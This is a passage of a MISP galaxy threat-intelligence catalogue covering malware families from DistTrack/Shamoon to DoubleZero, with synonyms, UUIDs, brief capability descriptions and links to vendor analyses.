Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DistTrack.
Known Synonyms |
---|
Shamoon |
Internal MISP references
UUID 25d03501-1fe0-4d5e-bc75-c00fbdaa83df
which can be used as unique global reference for DistTrack
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack - webarchive
- https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis - webarchive
- https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf - webarchive
- http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/ - webarchive
- https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon - webarchive
- http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html - webarchive
- http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412 - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf - webarchive
- https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/ - webarchive
- https://content.fireeye.com/m-trends/rpt-m-trends-2017 - webarchive
- https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/ - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf - webarchive
- https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://securelist.com/shamoon-the-wiper-copycats-at-work/ - webarchive
- https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/ - webarchive
- https://malwareindepth.com/shamoon-2012/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Divergent
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Divergent.
Known Synonyms |
---|
Novter |
Internal MISP references
UUID 7ca1e2ad-6cf4-44cc-8559-2f71e4fb2801
which can be used as unique global reference for Divergent
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent - webarchive
- https://www.cert-pa.it/notizie/devergent-malware-fileless/ - webarchive
- https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/ - webarchive
- https://blog.talosintelligence.com/2019/09/divergent-analysis.html - webarchive
- https://documents.trendmicro.com/assets/Tech-Brief-New-Fileless-Botnet-Novter-Distributed-by-KovCoreG-Malvertising-Campaign.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Diztakun
Internal MISP references
UUID 5e73185c-6070-45ed-88de-ed75580582eb
which can be used as unique global reference for Diztakun
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dizzyvoid
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dizzyvoid.
Known Synonyms |
---|
Errorroot |
Internal MISP references
UUID ca45c584-bce5-4b8b-87df-a2919128db55
which can be used as unique global reference for Dizzyvoid
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DLRAT
Internal MISP references
UUID b3f0f3a8-a50e-457b-a5dc-e17110ccac2f
which can be used as unique global reference for DLRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DMA Locker
Internal MISP references
UUID 1248cdf7-4180-4098-b1d0-389aa523a0ed
which can be used as unique global reference for DMA Locker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DMSniff
DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.
Internal MISP references
UUID f716681e-c1fd-439a-83aa-3147bb9f082f
which can be used as unique global reference for DMSniff
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff - webarchive
- https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d - webarchive
- https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DneSpy
DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components on the infected system. The malware is designed to receive a “policy” file in JSON format containing all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making DneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make DneSpy a fully functional espionage backdoor.
Internal MISP references
UUID 7c35d10d-b3da-459e-a272-da2ea7cee4c2
which can be used as unique global reference for DneSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DNSChanger
Internal MISP references
UUID 92db05a0-7d7e-40c3-94c8-ce3cd5e36daa
which can be used as unique global reference for DNSChanger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DNSMessenger
DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSMessenger.
Known Synonyms |
---|
TEXTMATE |
Internal MISP references
UUID b376580e-aba1-4ac9-9c2d-2df429efecf6
which can be used as unique global reference for DNSMessenger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://blog.talosintelligence.com/2017/03/dnsmessenger.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html - webarchive
- http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/ - webarchive
- https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DNSpionage
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSpionage.
Known Synonyms |
---|
Agent Drable |
AgentDrable |
Webmask |
Internal MISP references
UUID ef46bd90-91d0-4208-b3f7-08b65acb8438
which can be used as unique global reference for DNSpionage
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/ - webarchive
- https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/ - webarchive
- https://www.mandiant.com/resources/blog/global-dns-hijacking-campaign-dns-record-manipulation-at-scale - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-edgewater - webarchive
- https://marcoramilli.com/2019/04/23/apt34-webmask-project/ - webarchive
- https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2019/VB2019-Mercer-Rascagneres.pdf - webarchive
- https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html - webarchive
- https://nsfocusglobal.com/apt34-event-analysis-report/ - webarchive
- https://www.us-cert.gov/ncas/alerts/AA19-024A - webarchive
- https://www.youtube.com/watch?v=ws1k44ZhJ3g - webarchive
- https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/ - webarchive
- https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
dnWipe
Internal MISP references
UUID 0f6c16ec-e15c-480b-a5d3-cf5efe71821a
which can be used as unique global reference for dnWipe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DogHousePower
DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DogHousePower.
Known Synonyms |
---|
Shelma |
Internal MISP references
UUID 14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13
which can be used as unique global reference for DogHousePower
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Minodo
Since late February 2023, Minodo Backdoor campaigns have been employed to deliver either the Project Nemesis information stealer or more sophisticated backdoors like Cobalt Strike. This backdoor collects basic system information, which it then transmits to the C2 server. In return, it receives an AES-encrypted payload. Notably, the Minodo Backdoor is designed to contact a different C2 address for domain-joined systems. This suggests that more capable backdoors, such as Cobalt Strike, are downloaded on higher-value targets instead of Project Nemesis.
Internal MISP references
UUID 37169b2f-344e-4913-ab91-d447d597ffa7
which can be used as unique global reference for Minodo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Donex
Internal MISP references
UUID 2dcf3b68-9dd0-4e49-86ba-39f05599033d
which can be used as unique global reference for Donex
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DONOT
Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.
Internal MISP references
UUID 6d22d9e1-b38d-4a6f-a4bb-1121ced4adfc
which can be used as unique global reference for DONOT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.donot - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://labs.k7computing.com/index.php/the-donot-apt/ - webarchive
- https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
donut_injector
Donut is an open-source in-memory injector/loader designed to execute VBScript, JScript, EXE and DLL files and .NET assemblies. According to Symantec's Threat Hunter Team it was used in attacks against U.S. organisations, and according to Unit42 against U.S. defence contractors. GitHub: https://github.com/TheWover/donut
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular donut_injector.
Known Synonyms |
---|
Donut |
Internal MISP references
UUID d713f337-b9c7-406d-88e4-3352b2523c73
which can be used as unique global reference for donut_injector
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us - webarchive
- https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html - webarchive
- https://st.drweb.com/static/new-www/news/2024/september/Study_of_a_targeted_attack_on_a_Russian_rail_freight_operator_en.pdf - webarchive
- https://thewover.github.io/Introducing-Donut/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoorMe
Internal MISP references
UUID b91e1d34-cabd-404f-84d2-51a4f9840ffb
which can be used as unique global reference for DoorMe
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme - webarchive
- https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry - webarchive
- http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf - webarchive
- https://hitcon.org/2023/CMT/slide/Unmasking%20CamoFei_An%20In-depth%20Analysis%20of%20an%20Emerging%20APT%20Group%20Focused%20on%20Healthcare%20Sectors%20in%20East%20Asia.pdf - webarchive
- https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DOPLUGS
Internal MISP references
UUID def463e0-0664-46aa-9888-d92380a4eebc
which can be used as unique global reference for DOPLUGS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.doplugs - webarchive
- https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf - webarchive
- https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/ - webarchive
- https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html - webarchive
- https://files.speakerdeck.com/presentations/6d01e26c85a444d0a3f888e45629635f/hodur_recon2024.pdf - webarchive
- https://lab52.io/blog/mustang-pandas-plugx-new-variant-targetting-taiwanese-government-and-diplomats/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoppelDridex
DoppelDridex is a fork of Indrik Spider's Dridex malware. DoppelDridex has been run as a parallel operation to Dridex with a different malware versioning system, different RSA key, and with different infrastructure.
Internal MISP references
UUID b634a2ac-da01-43c0-b823-a235497a10a8
which can be used as unique global reference for DoppelDridex
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex - webarchive
- https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true - webarchive
- https://cyber-anubis.github.io/malware%20analysis/dridex/ - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/ - webarchive
- https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware - webarchive
- https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/ - webarchive
- https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://medium.com/s2wlab/operation-synctrek-e5013df8d167 - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/ - webarchive
- https://redcanary.com/blog/grief-ransomware/ - webarchive
- https://blogs.blackberry.com/en/2021/11/zebra2104 - webarchive
- https://twitter.com/BrettCallow/status/1453557686830727177?s=20 - webarchive
- https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoppelPaymer
DoppelPaymer is a ransomware family that encrypts user data and then demands a ransom to restore the original files. It is recognizable by the trademark file extension it appends to encrypted files, .doppeled, and by the ransom note file it creates, named ".how2decrypt.txt".
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DoppelPaymer.
Known Synonyms |
---|
Pay OR Grief |
Internal MISP references
UUID 16a76dcf-92cb-4371-8440-d6b3adbb081b
which can be used as unique global reference for DoppelPaymer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/ - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/ - webarchive
- https://medium.com/s2wlab/operation-synctrek-e5013df8d167 - webarchive
- https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/ - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://www.ic3.gov/Media/News/2020/201215-1.pdf - webarchive
- https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/ - webarchive
- https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/ - webarchive
- https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1 - webarchive
- https://redcanary.com/blog/grief-ransomware/ - webarchive
- https://twitter.com/AltShiftPrtScn/status/1385103712918642688 - webarchive
- https://twitter.com/BrettCallow/status/1453557686830727177?s=20 - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html - webarchive
- https://techcrunch.com/2020/03/01/visser-breach/ - webarchive
- https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-heron - webarchive
- https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html - webarchive
- https://twitter.com/vikas891/status/1385306823662587905 - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/ - webarchive
- https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/ - webarchive
- https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/ - webarchive
- https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/ - webarchive
- https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/ - webarchive
- https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/ - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/ - webarchive
- https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/ - webarchive
- https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-heron - webarchive
- https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NgrBot
Internal MISP references
UUID 91191c0a-96d8-40b8-b8fb-daa0ad009c87
which can be used as unique global reference for NgrBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/ - webarchive
- https://research.checkpoint.com/dorkbot-an-investigation/ - webarchive
- https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/ - webarchive
- http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dorshel
Internal MISP references
UUID d3b5a884-1fd6-4cc4-9837-7d8ee8817711
which can be used as unique global reference for Dorshel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel - webarchive
- https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dosia
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dosia.
Known Synonyms |
---|
DDOSIA |
Internal MISP references
UUID eabd30ed-d2ec-43b5-b790-7381f93a3a03
which can be used as unique global reference for Dosia
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dosia - webarchive
- https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/ - webarchive
- https://blog.sekoia.io/Noname05716-Ddosia-project-2024-updates-and-behavioural-shifts/ - webarchive
- https://decoded.avast.io/martinchlumecky/ddosia-project-how-noname05716-is-trying-to-improve-the-efficiency-of-ddos-attacks/ - webarchive
- https://blog.sekoia.io/following-noname05716-ddosia-projects-targets/ - webarchive
- https://viuleeenz.github.io/posts/2023/05/extracting-ddosia-targets-from-process-memory/ - webarchive
- https://www.team-cymru.com/post/a-blog-with-noname - webarchive
- https://medium.com/@b42labs/data-insights-from-russian-cyber-militants-noname057-9f4db98f60e - webarchive
- https://noname.be42late.co/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DOSTEALER
According to Mandiant, DOSTEALER is a dataminer that mines browser login and cookie data. It is also capable of taking screenshots and logging keystrokes.
Internal MISP references
UUID 3b4bf82d-5c57-4ea2-847d-f2fd292ba730
which can be used as unique global reference for DOSTEALER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dot Ransomware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dot Ransomware.
Known Synonyms |
---|
MZP Ransomware |
Internal MISP references
UUID fc63c3ea-23ed-448d-9d66-3fb87ebea4ba
which can be used as unique global reference for Dot Ransomware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DOUBLEBACK
DOUBLEBACK is a newly discovered fileless malware deployed as part of an attack campaign that took place in December 2020. The threat actors responsible for the operations are tracked as UNC2529 by researchers. According to their findings, DOUBLEBACK is the final payload delivered onto the compromised systems. Its task is to establish and maintain a backdoor on the victim's machine.
Internal MISP references
UUID 1cda1810-f705-4d6b-9c9e-f509f8c7f5c5
which can be used as unique global reference for DOUBLEBACK
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoubleFantasy (Windows)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DoubleFantasy (Windows).
Known Synonyms |
---|
VALIDATOR |
Internal MISP references
UUID 46a523ca-be25-4f59-bc01-2c006c58bf80
which can be used as unique global reference for DoubleFantasy (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy - webarchive
- https://twitter.com/Int2e_/status/1294565186939092994 - webarchive
- https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/ - webarchive
- https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoubleFinger
Internal MISP references
UUID 4f1e5142-0f62-48ee-a4a7-d8072fd78dcf
which can be used as unique global reference for DoubleFinger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoublePulsar
Internal MISP references
UUID 32984744-c0f9-43f7-bfca-c3276248a4fa
which can be used as unique global reference for DoublePulsar
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar - webarchive
- https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit - webarchive
- https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/ - webarchive
- https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/ - webarchive
- https://github.com/countercept/doublepulsar-c2-traffic-decryptor - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoubleZero
A wiper identified by CERT-UA on March 17th, written in C#.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DoubleZero.
Known Synonyms |
---|
FiberLake |
Internal MISP references
UUID 7b4234ff-a7c2-4991-b4bf-6e13c57103cd
which can be used as unique global reference for DoubleZero
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.doublezero - webarchive
